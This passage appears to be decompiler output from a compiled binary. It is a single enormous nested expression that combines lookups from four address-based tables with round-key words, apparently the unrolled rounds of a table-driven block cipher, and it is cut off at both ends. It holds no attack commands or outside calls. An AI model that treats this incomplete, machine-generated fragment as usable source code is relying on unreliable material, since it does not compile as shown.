(_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x18) * 4) ^  *(0x4141c8 + (_t162 & 0x000000ff) * 4) ^ _t257[6];
						_t259 = _t259 - 0x20;
						_t167 =  *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  